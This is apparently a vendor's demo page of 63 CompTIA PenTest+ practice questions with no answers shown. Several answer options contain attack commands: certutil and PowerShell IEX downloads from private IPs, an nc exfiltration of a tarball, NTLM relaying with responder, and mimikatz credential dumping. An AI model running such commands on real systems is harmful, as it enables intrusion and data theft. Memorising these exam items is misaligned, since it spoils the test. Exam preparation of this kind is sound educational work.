Weekend Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70percent

CompTIA PT0-003 CompTIA PenTest+ Exam Exam Practice Test

Demo: 63 questions
Total 246 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?

Options:

A.

Restore the configuration.

B.

Perform a BIA.

C.

Follow the escalation process.

D.

Select the target.

Question 2

A penetration tester observes the following output from an Nmap command while attempting to troubleshoot connectivity to a Linux server:

Starting Nmap 7.91 ( https://nmap.org ) at 2024-01-10 12:00 UTC

Nmap scan report for example.com (192.168.1.10)

Host is up (0.001s latency).

Not shown: 9999 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

2222/tcp open ssh

444/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Which of the following is the most likely reason for the connectivity issue?

Options:

A.

The SSH service is running on a different port.

B.

The SSH service is blocked by a firewall.

C.

The SSH service requires certificate authentication.

D.

The SSH service is not active.

Question 3

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

kotlin

Copy code

Nmap scan report for some_host

Host is up (0.01 latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results: smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.

responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf

B.

msf > use exploit/windows/smb/ms17_010_psexec msf > msf > run

C.

hydra -L administrator -P /path/to/passwdlist smb://

D.

nmap —script smb-brute.nse -p 445

Question 4

A penetration tester is attempting to discover vulnerabilities in a company's web application. Which of the following tools would most likely assist with testing the security of the web application?

Options:

A.

OpenVAS

B.

Nessus

C.

sqlmap

D.

Nikto

Question 5

A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

Options:

A.

Censys.io

B.

Shodan

C.

Wayback Machine

D.

SpiderFoot

Question 6

During an assessment, a penetration tester obtains access to a Microsoft SQL server using sqlmap and runs the following command:

sql> xp_cmdshell whoami /all

Which of the following is the tester trying to do?

Options:

A.

List database tables

B.

Show logged-in database users

C.

Enumerate privileges

D.

Display available SQL commands

Question 7

A penetration tester needs to confirm the version number of a client's web application server. Which of the following techniques should the penetration tester use?

Options:

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Question 8

A penetration tester is configuring a vulnerability management solution to perform credentialed scans of an Active Directory server. Which of the following account types should the tester provide to the scanner?

Options:

A.

Read-only

B.

Domain administrator

C.

Local user

D.

Root

Question 9

A penetration tester attempts unauthorized entry to the company's server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?

Options:

A.

Plug spinner

B.

Bypassing

C.

Decoding

D.

Raking

Question 10

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

Options:

A.

SQL injection

B.

SSRF

C.

XSS

D.

Server-side template injection

Question 11

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1

B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe

C.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/ ")

D.

rundll32.exe c:\path\foo.dll,functName

Question 12

A penetration tester is searching for vulnerabilities or misconfigurations on a container environment. Which of the following tools will the tester most likely use to achieve this objective?

Options:

A.

Nikto

B.

Trivy

C.

Nessus

D.

Nmap

Question 13

A penetration tester needs to obtain sensitive data from several executives who regularly work while commuting by train. Which of the following methods should the tester use for this task?

Options:

A.

Shoulder surfing

B.

Credential harvesting

C.

Bluetooth spamming

D.

MFA fatigue

Question 14

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 15

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Options:

Question 16

A penetration tester is performing a network security assessment. The tester wants to intercept communication between two users and then view and potentially modify transmitted data. Which of the following types of on-path attacks would be best to allow the penetration tester to achieve this result?

Options:

A.

DNS spoofing

B.

ARP poisoning

C.

VLAN hopping

D.

SYN flooding

Question 17

Which of the following technologies is most likely used with badge cloning? (Select two).

Options:

A.

NFC

B.

RFID

C.

Bluetooth

D.

Modbus

E.

Zigbee

F.

CAN bus

Question 18

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Remove the persistence mechanisms.

B.

Spin down the infrastructure.

C.

Preserve artifacts.

D.

Perform secure data destruction.

Question 19

A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?

Options:

A.

OWASP MASVS

B.

OSSTMM

C.

MITRE ATT&CK

D.

CREST

Question 20

A tester is finishing an engagement and needs to ensure that artifacts resulting from the test are safely handled. Which of the following is the best procedure for maintaining client data privacy?

Options:

A.

Remove configuration changes and any tools deployed to compromised systems.

B.

Securely destroy or remove all engagement-related data from testing systems.

C.

Search through configuration files changed for sensitive credentials and remove them.

D.

Shut down C2 and attacker infrastructure on premises and in the cloud.

Question 21

A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access. Which of the following techniques should the tester use?

Options:

A.

Credential stuffing

B.

MFA fatigue

C.

Dictionary attack

D.

Brute-force attack

Question 22

A penetration tester is performing a cloud-based penetration test against a company. Stakeholders have indicated the priority is to see if the tester can get into privileged systems that are not directly accessible from the internet. Given the following scanner information:

Server-side request forgery (SSRF) vulnerability in test.comptia.org

Reflected cross-site scripting (XSS) vulnerability in test2.comptia.org

Publicly accessible storage system named static_comptia_assets

SSH port 22 open to the internet on test3.comptia.org

Open redirect vulnerability in test4.comptia.org

Which of the following attack paths should the tester prioritize first?

Options:

A.

Synchronize all the information from the public bucket and scan it with Trufflehog.

B.

Run Pacu to enumerate permissions and roles within the cloud-based systems.

C.

Perform a full dictionary brute-force attack against the open SSH service using Hydra.

D.

Use the reflected cross-site scripting attack within a phishing campaign to attack administrators.

E.

Leverage the SSRF to gain access to credentials from the metadata service.

Question 23

During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?

Options:

A.

certutil.exe

B.

bitsadmin.exe

C.

msconfig.exe

D.

netsh.exe

Question 24

While performing a penetration testing exercise, a tester executes the following command:

bash

Copy code

PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PSExec on the server01 using CMD.exe.

B.

Perform a lateral movement attack using PsExec.

C.

Send the PsExec binary file to the server01 using CMD.exe.

D.

Enable CMD.exe on the server01 through PsExec.

Question 25

A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?

Options:

A.

MITRE ATT&CK

B.

OSSTMM

C.

CI/CD

D.

DREAD

Question 26

During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:

mimikatz # privilege::debug

mimikatz # lsadump::cache

---Output---

lapsUser

27dh9128361tsg2€459210138754ij

---OutputEnd---

Which of the following best describes what the tester plans to do by executing the command?

Options:

A.

The tester plans to perform the first step to execute a Golden Ticket attack to compromise the Active Directory domain.

B.

The tester plans to collect application passwords or hashes to compromise confidential information within the local computer.

C.

The tester plans to use the hash collected to perform lateral movement to other computers using a local administrator hash.

D.

The tester plans to collect the ticket information from the user to perform a Kerberoasting attack on the domain controller.

Question 27

A penetration tester is conducting an assessment of a web application's login page. The tester needs to determine whether there are any hidden form fields of interest. Which of the following is the most effective technique?

Options:

A.

XSS

B.

On-path attack

C.

SQL injection

D.

HTML scraping

Question 28

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

Options:

A.

OS fingerprinting

B.

Attack path mapping

C.

Service discovery

D.

User enumeration

Question 29

A penetration tester gains shell access to a Windows host. The tester needs to permanently turn off protections in order to install additional payload. Which of the following commands is most appropriate?

Options:

A.

sc config start=disabled

B.

sc query state= all

C.

pskill

D.

net config

Question 30

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Options:

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Question 31

A penetration tester has been asked to conduct a blind web application test against a customer's corporate website. Which of the following tools would be best suited to perform this assessment?

Options:

A.

ZAP

B.

Nmap

C.

Wfuzz

D.

Trufflehog

Question 32

A penetration tester successfully gained access to manage resources and services within the company's cloud environment. This was achieved by exploiting poorly secured administrative credentials that had extensive permissions across the network. Which of the following credentials was the tester able to obtain?

Options:

A.

IAM credentials

B.

SSH key for cloud instance

C.

Cloud storage credentials

D.

Temporary security credentials (STS)

Question 33

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Hostname | IP address | CVSS 2.0 | EPSS

hrdatabase | 192.168.20.55 | 9.9 | 0.50

financesite | 192.168.15.99 | 8.0 | 0.01

legaldatabase | 192.168.10.2 | 8.2 | 0.60

fileserver | 192.168.125.7 | 7.6 | 0.90

Which of the following targets should the tester select next?

Options:

A.

fileserver

B.

hrdatabase

C.

legaldatabase

D.

financesite

Question 34

A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network. Which of the following is the next task the tester should complete to accomplish the objective?

Options:

A.

Initiate a social engineering campaign.

B.

Perform credential dumping.

C.

Compromise an endpoint.

D.

Share enumeration.

Question 35

A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?

Options:

A.

Phishing

B.

Tailgating

C.

Whaling

D.

Spear phishing

Question 36

A penetration tester wants to use PowerView in an AD environment. Which of the following is the most likely reason?

Options:

A.

To collect local hashes

B.

To decrypt stored passwords

C.

To enumerate user groups

D.

To escalate privileges

Question 37

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Options:

A.

nslookup mydomain.com » /path/to/results.txt

B.

crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com

C.

dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt

D.

cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com

Question 38

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

Options:

A.

Configuration changes were not reverted.

B.

A full backup restoration is required for the server.

C.

The penetration test was not completed on time.

D.

The penetration tester was locked out of the system.

Question 39

After a recent penetration test was conducted by the company's penetration testing team, a systems administrator notices the following in the logs:

2/10/2023 05:50AM C:\users\mgranite\schtasks /query

2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

Which of the following best explains the team's objective?

Options:

A.

To enumerate current users

B.

To determine the users' permissions

C.

To view scheduled processes

D.

To create persistence in the network

Question 40

A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output:

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl

200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python

Which of the following actions should the tester take to get the scans to work properly?

Options:

A.

Modify the scanner to slow down the scan.

B.

Change the source IP with a VPN.

C.

Modify the scanner to only use HTTP GET requests.

D.

Modify the scanner user agent.

Question 41

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

Options:

A.

Covert data exfiltration

B.

URL spidering

C.

HTML scrapping

D.

DoS attack

Question 42

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

Options:

A.

Clone badge information in public areas of the facility to gain access to restricted areas.

B.

Tailgate into the facility during a very busy time to gain initial access.

C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.

D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.

Question 43

An external legal firm is conducting a penetration test of a large corporation. Which of the following would be most appropriate for the legal firm to use in the subject line of a weekly email update?

Options:

A.

Privileged & Confidential Status Update

B.

Action Required Status Update

C.

Important Weekly Status Update

D.

Urgent Status Update

Question 44

A penetration tester wants to use the following Bash script to identify active servers on a network:

1 network_addr="192.168.1"

2 for h in {1..254}; do

3 ping -c 1 -W 1 $network_addr.$h > /dev/null

4 if [ $? -eq 0 ]; then

5 echo "Host $h is up"

6 else

7 echo "Host $h is down"

8 fi

9 done

Which of the following should the tester do to modify the script?

Options:

A.

Change the condition on line 4.

B.

Add 2>&1 at the end of line 3.

C.

Use seq on the loop on line 2.

D.

Replace $h with ${h} on line 3.

Question 45

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

Options:

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

Question 46

A penetration tester finishes an initial discovery scan for hosts on a /24 customer subnet. The customer states that the production network is composed of Windows servers but no container clusters. The following are the last several lines from the scan log:

Line 1: 112 hosts found... trying ports

Line 2: FOUND 22 with OpenSSH 1.2p2 open on 99 hosts

Line 3: FOUND 161 with UNKNOWN banner open on 110 hosts

Line 4: TCP RST received on ports 21, 3389, 80

Line 5: Scan complete.

Which of the following is the most likely reason for the results?

Options:

A.

Multiple honeypots were encountered

B.

The wrong subnet was scanned

C.

Windows is using WSL

D.

IPS is blocking the ports

Question 47

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 48

A penetration tester reviews a SAST vulnerability scan report. The following vulnerability has been reported as high severity:

Source file: components.ts

Issue 2 of 12: Command injection

Severity: High

Call: .innerHTML = response

The tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code. Which of the following describes how the tester should classify this reported vulnerability?

Options:

A.

False negative

B.

False positive

C.

True positive

D.

Low severity

Question 49

A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:

Action | SRC

| DEST

| --

Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP

Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCP

Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCP

Block | . | . | *

Which of the following commands should the tester try next?

Options:

A.

tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 443 < /tmp/data.tar.gz

B.

gzip /path/to/data && cp data.gz 443

C.

gzip /path/to/data && nc -nvlk 443; cat data.gz ' nc -w 3 22

D.

tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz

Question 50

During an assessment, a penetration tester runs the following command:

setspn.exe -Q /

Which of the following attacks is the penetration tester preparing for?

Options:

A.

LDAP injection

B.

Pass-the-hash

C.

Kerberoasting

D.

Dictionary

Question 51

A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?

Options:

A.

Cryptographic flaws

B.

Protocol scanning

C.

Cached pages

D.

Job boards

Question 52

A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client. The team crafts a Bash script for this task. However, they find a minor error in one line of the script:

1 #!/bin/bash

2 for i in $(cat example.txt); do

3 curl $i

4 done

Which of the following changes should the team make to line 3 of the script?

Options:

A.

resolvconf $i

B.

rndc $i

C.

systemd-resolve $i

D.

host $i

Question 53

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?

Options:

A.

Privilege escalation

B.

DOM injection

C.

Session hijacking

D.

Cross-site scripting

Question 54

A penetration tester successfully clones a source code repository and then runs the following command:

find . -type f -exec egrep -i "token|key|login" {} \;

Which of the following is the penetration tester conducting?

Options:

A.

Data tokenization

B.

Secrets scanning

C.

Password spraying

D.

Source code analysis

Question 55

A penetration tester sets up a C2 (Command and Control) server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?

Options:

A.

ProxyChains

B.

Covenant

C.

PsExec

D.

sshuttle

Question 56

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

Options:

A.

Articulation of cause

B.

Articulation of impact

C.

Articulation of escalation

D.

Articulation of alignment

Question 57

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

Options:

Question 58

Which of the following components should a penetration tester include in the final assessment report?

Options:

A.

User activities

B.

Customer remediation plan

C.

Key management

D.

Attack narrative

Question 59

During a red-team exercise, a penetration tester obtains an employee's access badge. The tester uses the badge's information to create a duplicate for unauthorized entry. Which of the following best describes this action?

Options:

A.

Smurfing

B.

Credential stuffing

C.

RFID cloning

D.

Card skimming

Question 60

A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client's offices. Which of the following techniques should the penetration tester leverage?

Options:

A.

Port mirroring

B.

Sidecar scanning

C.

ARP poisoning

D.

Channel scanning

Question 61

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

Options:

A.

A collection of email addresses for the target domain that is available on multiple sources on the internet

B.

DNS records for the target domain and subdomains that could be used to increase the external attack surface

C.

Data breach information about the organization that could be used for additional enumeration

D.

Information from the target's main web page that collects usernames, metadata, and possible data exposures

Question 62

A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?

Options:

A.

Encoding the data and pushing through DNS to the tester's controlled server.

B.

Padding the data and uploading the files through an external cloud storage service.

C.

Obfuscating the data and pushing through FTP to the tester's controlled server.

D.

Hashing the data and emailing the files to the tester's company inbox.

Question 63

During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing. Which of the following tools should the tester use?

Options:

A.

Mimikatz

B.

ZAP

C.

OllyDbg

D.

SonarQube

Demo: 63 questions
Total 246 questions